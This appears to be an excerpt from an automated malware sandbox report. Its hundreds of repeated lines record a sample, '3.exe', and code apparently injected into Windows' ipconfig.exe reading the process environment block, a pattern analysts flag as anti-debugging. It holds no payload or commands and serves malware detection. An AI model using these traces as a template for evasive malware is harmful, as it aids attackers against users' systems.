          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B53D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B78F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BDFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C34257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BB8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C523E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BDB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C5D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C75BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C78B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6131B mov eax, dword ptr fs:[00000030h]
